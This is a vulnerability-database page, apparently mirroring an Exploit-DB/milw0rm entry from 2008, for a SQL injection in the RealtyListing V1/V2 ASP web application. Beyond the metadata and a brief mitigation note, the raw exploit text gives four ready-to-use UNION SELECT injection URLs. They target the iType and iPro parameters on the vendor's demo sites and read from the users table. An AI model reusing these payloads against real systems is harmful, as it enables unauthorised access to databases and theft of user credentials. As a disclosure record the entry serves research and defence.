header-logo
Suggest Exploit
vendor:
RealtyListing
by:
AlpHaNiX
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RealtyListing
Affected Version From: V1
Affected Version To: V2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

RealtyListing V1/V2

The RealtyListing V1/V2 application is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : RealtyListing V1/V2
#download : null
#Demo     : http://www.aspsiteware.com/Realty1
	    http://www.aspsiteware.com/realty2/realty2/


###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users


###########################################################################

# milw0rm.com [2008-12-14]

Navigation

Suggest Exploit

Services By CQR